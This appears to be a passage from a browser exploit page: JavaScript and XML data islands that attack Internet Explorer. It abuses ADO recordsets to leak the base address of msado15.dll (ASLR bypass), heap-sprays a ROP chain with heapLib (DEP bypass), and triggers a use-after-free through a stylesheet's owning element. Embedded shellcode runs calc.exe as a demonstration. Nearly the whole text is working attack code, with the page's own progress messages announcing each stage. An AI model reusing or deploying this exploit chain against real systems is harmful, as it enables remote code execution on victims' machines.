localxmlid1.AddNew([\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"], [\"c\"]); \r\n localxmlid5.AddNew([\"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\"], [\"c\"]); \r\n \r\n \r\n var my1field = localxmlid5.Fields.Item(0);\r\n localxmlid1.MoveFirst();\r\n \r\n localxmlid2.AddNew([\"BBBB\"], [\"c\"]); \r\n \r\n localxmlid1.Close();\r\n CollectGarbage();\r\n \r\n localxmlid3.MoveFirst();\r\n \r\n void(Math.atan2(0xbabe, ('###################### 2 Move First').toString()));\r\n localxmlid2.MoveFirst();\r\n\r\n void(Math.atan2(0xbabe, ('###################### 5 Move First').toString()));\r\n localxmlid5.CacheSize = 0x40000008;\r\n localxmlid5.MoveFirst();\r\n localxmlid3.AddNew([\"MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong\"], [\"cccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuFINDMEccccc\"]); \r\n\r\n var localxmlid4 = document.getElementById('xmlid4').recordset; \r\n\r\n localxmlid4.AddNew([\"bb\"], [\"c\"]); \r\n\r\n localxmlid4.MoveNext(); \r\n \r\n \r\n var localxmlid6 = document.getElementById('xmlid6').recordset; \r\n localxmlid6.AddNew([\"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\"], [\"c\"]); \r\n \r\n localxmlid2.MoveFirst();\r\n \r\n Math.tan(1);\r\n \r\n document.getElementById('textfaseone').innerText = 'Setting up data for ASLR evasion:';\r\n if(GlobalRowCounter < 0x10120) {\r\n \twindow.setTimeout(IncreaseRowCounter, 100);\r\n }\r\n}\r\n\r\n\r\nfunction IncreaseRowCounter() {\r\n\t//alert('IncreaseRowCounter: ' + GlobalRowCounter)\r\n\tif(GlobalRowCounter < 0x10120) {\t\t\r\n \tfor(i = 0; i < 0x300; i++) { \t\t\r\n \t\tGlobalRowCounter++;\r\n localxmlid2.AddNew([\"BBBB\"], [\"c\"]); \r\n localxmlid2.Delete();\r\n }\r\n var percentcomplete = Math.round(GlobalRowCounter /0x10120 * 100);\r\n document.getElementById('progressfaseone').innerText = percentcomplete + \"%\";\r\n window.setTimeout(IncreaseRowCounter, 100);\r\n }\r\n else {\r\n \tdocument.getElementById('textfaseonedone').innerText = 'Now searching memory for suitable vtable. Please wait...';\r\n \twindow.setTimeout(FindADOBase, 100);\r\n }\r\n}\r\n\r\nfunction FindADOBase() {\r\n\t//alert('FindADOBase');\r\n \r\n \t\r\n var myfield = localxmlid3.Fields.Item(1);\r\n\r\n \tfor(i = 0; i < 0xDF6; i++) {\r\n localxmlid2.AddNew([\"BBBB\"], [\"c\"]); \r\n localxmlid2.MoveFirst();\r\n if(myfield.Name != \"MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong\") {\r\n \tbreak;\r\n }\r\n }\r\n //alert('done first');\r\n\r\n void(Math.atan2(0xbabe, ('###################### Add untill vftable 2').toString()));\r\n \r\n var vftable1 = null;\r\n var vftable2 = null;\r\n \r\n \tfor(i = 0; i < 0xAE0; i++) {\r\n \t\tvoid(Math.atan2(0xbabe, ('add row: ' + i).toString()));\r\n localxmlid2.AddNew([\"BBBB\"], [\"c\"]); \r\n localxmlid2.MoveFirst();\r\n //if(i > 10) {\r\n // document.forms[0].myresult.value += i.toString(16) + \" : \" + escape(myfield.name.substr((2 * i) + 4, 8)) + \" : \" + myfield.name.length + \"\\n\";\r\n //}\r\n if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uAD68/)) {\r\n \tvftable1 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\\w\\w\\w\\w)%u(\\w\\w\\w\\w)/, \"$2$1\");\r\n } \r\n if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uD738/)) {\r\n \tvftable2 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\\w\\w\\w\\w)%u(\\w\\w\\w\\w)/, \"$2$1\");\r\n } \r\n if(vftable1 && vftable2) {\r\n \tbreak;\r\n }\r\n }\r\n //document.forms[0].myresult.value += \"\\n\\nVFTABLES: \" + vftable1 + \" : \" + vftable2 + \"\\n\\n\\n\";\r\n //alert(vftable1);\r\n if((parseInt(vftable1,16) - 0x1AD68) == (parseInt(vftable2,16) - 0xD738)) { \t \r\n \t adobase = parseInt(vftable1,16) - 0x1AD68;\r\n \t document.getElementById('textfoundaddress').innerText = 'Found base address of <censored>.dll: 0x<censored>';// + adobase.toString(16);\r\n \t FaseTwo();\r\n }\r\n else {\r\n alert('sadly we failed to read the base address of msado15.dll :( ');\t\r\n }\r\n \r\n} \r\n\r\nfunction FaseTwo() {\t\r\n\tdocument.getElementById('textfasetwo').innerText = 'Setting up heap for DEP evasion:';\r\n\tdocument.getElementById('progressfasetwo').innerText = '0%';\r\n heap = new heapLib.ie(0x20000);\r\n\r\n \r\n var heapspray = unescape(\"%u2020%u1604%u0102%u0103%u0104%u0105\" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + \"%u010A%u010B\" + MakeAddressString(adobase + 0x4270B) + \"%u010E%u010F%u0110%u0111%u0112%u0113\" + \"%u2100%u1604\" + \"%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123\" + MakeAddressString(adobase) + \"%u0126%u0127%u0128%u0129%u012A%u012B\" + \"%u2024%u1604\" + \"%u012E%u012F%u0130%u0131%u0132%u0133\" + \"%u0040%u0000\" + \"%u0136%u0137\" + MakeAddressString(adobase + 0x1B1F0) + \"%u013A%u013B\" + \"%u0200%u0000\" + \"%u013E%u013F\" + \"%u2030%u1604\" + \"%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F\" + \r\n \"%u9090%u9090%u868B%u1108%u0000%u5056%u056A%uA068%u0421%u0516%u185E%u0008%uD0FF%u5058%u0590%u0BBB%u0000%uD0FF%uF88B%u0558%u3B47%u0000%u006A%uFF57%uCCD0\" + \"%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF\" + \r\n \"%u6163%u636C%u652E%u6578%u0000%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578%u0000%u0000\" + \"%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF\" + \"%u20A0%u1604\" + \"%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF\");\r\n //\"%u6163%u636C%u652D%u6578%u0000\r\n //%u3A63%u775C%u6E69%u6F64%u7377%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578\r\n //c:\\windows\\system32\\calc.exe\r\n //%63%61%6C%63%2E%65%78%65\r\n //%63%3A%5C%77%69%6E%64%6F%77%73%5C%73%79%73%74%65%6D%33%32%5C%63%61%6C%63%2E%65%78%65 \r\n \r\n //var heapspray = unescape(\"%u2020%u1604%u0102%u0103%u0104%u0105\" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + \"%u010A%u010B\" + MakeAddressString(adobase + 0x4270B) + \"%u010E%u010F%u0110%u0111%u0112%u0113\" + \"%u2100%u1604\" + \"%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123%u0124%u0125%u0126%u0127%u0128%u0129%u012A%u012B\" + \"%u2024%u1604\" + \"%u012E%u012F%u0130%u0131%u0132%u0133\" + \"%u0040%u0000\" + \"%u0136%u0137\" + MakeAddressString(adobase + 0x1B1F0) + \"%u013A%u013B\" + \"%u0200%u0000\" + \"%u013E%u013F\" + \"%u2030%u1604\" + \"%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F%u0170%u0171%u0172%u0173%u0174%u0175%u0176%u0177%u0178%u0179%u017A%u017B%u017C%u017D%u017E%u017F%u0180%u0181%u0182%u0183%u0184%u0185%u0186%u0187%u0188%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF%u01C0%u01C1%u01C2%u01C3%u01C4%u01C5%u01C6%u01C7%u01C8%u01C9%u01CA%u01CB%u01CC%u01CD%u01CE%u01CF%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF\" + \"%u20A0%u1604\" + \"%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF\");\r\n\r\n while(heapspray.length < 0x200) heapspray += unescape(\"%u4444\");\r\n\r\n var heapblock = heapspray;\r\n while(heapblock.length < 0x40000) heapblock += heapblock;\r\n finalspray = heapblock.substring(2, 0x40000 - 0x21);\r\n\r\n //alert('Base address of ado15.dll ' + adobase.toString(16));\r\n if(CurrentHeapSpraySize < 900) {\r\n \twindow.setTimeout(SprayHeap, 100);\r\n }\r\n else {\r\n \tRunExploit();\r\n }\r\n}\r\n\r\nfunction SprayHeap() {\r\n if(CurrentHeapSpraySize < FinalHeapSpraySize - 1) {\r\n for(var i = 0; i < 90; i++) {\r\n heap.alloc(finalspray);\r\n CurrentHeapSpraySize++;\r\n }\r\n var percentcomplete = Math.round(CurrentHeapSpraySize /FinalHeapSpraySize * 100);\r\n document.getElementById('progressfasetwo').innerText = percentcomplete + \"%\"; \r\n window.setTimeout(SprayHeap, 100);\r\n } \r\n\telse {\r\n\t\tdocument.getElementById('textfasetwodone').innerText = \"Ready to start calc.exe in: \"; \r\n\t\twindow.setTimeout(RunExploitTimer, 100);\r\n\t}\r\n\t\r\n}\r\n\r\nfunction RunExploitTimer() {\r\n\tif(ExpoitTime > 0) {\r\n\t\tdocument.getElementById('countexploitrun').innerText = ExpoitTime;\r\n\t\twindow.setTimeout(RunExploitTimer, 500);\r\n\t\tExpoitTime--;\r\n\t}\r\n\telse {\r\n\t\tdocument.getElementById('countexploitrun').innerText = 0;\t\r\n\t\tvar EndTime = new Date();\r\n\t var TotalRun = Math.round((EndTime.getTime() - StartTime.getTime()) / 1000);\r\n\t document.getElementById('totalruntime').innerText = \"Total exploitation time: \" + TotalRun + \" seconds\"; \t\r\n\t\twindow.setTimeout(RunExploit, 100);\r\n\t}\r\n}\r\n \r\nfunction RunExploit() {\r\n \r\n var elms = new Array();\r\n for(i =0; i < 100; i++) {\r\n\t elms.push(document.createElement('div'));\r\n }\r\n\r\n owningObj = document.styleSheets[0].owningElement; \r\n\r\n myimports = document.styleSheets[0].imports;\r\n\r\n document.appendChild(owningObj);\r\n document.removeChild(owningObj);\r\n\r\n owningObj.outerHTML = 'a';\r\n\r\n Math.atan2(0xbabe, \"Collect\");\r\n CollectGarbage();\r\n\r\n Math.atan2(0xbabe, \"spray\");\r\n for(i = 0; i < 100; i++) {\r\n \telms[i].className = unescape(\"%u4140%u4141%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u2020%u1604%u2020%u1604%u4159%u415a%u415b\");\r\n } \r\n\r\n Result = owningObj.insertAdjacentElement(myimports,'a');\r\n \r\n\t\r\n} \r\n\r\nfunction MakeAddressString(addrint) {\r\n\t//First, turn into hex:\r\n\tvar addstr = addrint.toString(16);\r\n\t//Split and swap\r\n\taddstr = addstr.replace(/(\\w\\w\\w\\w)(\\w\\w\\w\\w)/,\"%u$2%u$1\");\r\n\treturn addstr;\r\n}\r\n \r\n </script>\r\n\r\n </head>\r\n <body onLoad=\"window.setTimeout(Start,100);\" id=\"bodyid\">\r\n <div>\r\n \t<h2 id=\"textfaseone\"></h2>\r\n \t<br>\r\n <h2 id=\"progressfaseone\"></h2>\r\n <br>\r\n <h2 id=\"textfaseonedone\"></h2>\r\n <br>\r\n <h2 id=\"textfoundaddress\"></h2>\r\n <br>\r\n <h2 id=\"textfasetwo\"></h2>\r\n <br>\r\n <h2 id=\"progressfasetwo\"></h2>\r\n <br>\r\n <h2 id=\"textfasetwodone\"></h2>\r\n <br>\r\n <h2 id=\"countexploitrun\"></h2>\r\n <br>\r\n <h2 id=\"totalruntime\"></h2>\r\n </div>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid1\">\r\n<Devices>\r\n<Device>\r\n<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA />\r\n</Device>\r\n</Devices>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid2\">\r\n<Devices>\r\n<Device>\r\n<BBBB />\r\n</Device>\r\n</Devices>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid3\">\r\n<root>\r\n<data>\r\n\t<SmallData>\r\n </SmallData>\r\n<MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>\r\n\tvalue1\r\n</MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>\r\n</data>\r\n</root>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid4\">\r\n<Devices>\r\n<Device>\r\n<bb />\r\n</Device>\r\n</Devices>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML ID=\"xmlid5\">\r\n<Devices>\r\n<Device>\r\n<BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB />\r\n</Device>\r\n</Devices>\r\n</XML>\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\r\n<XML 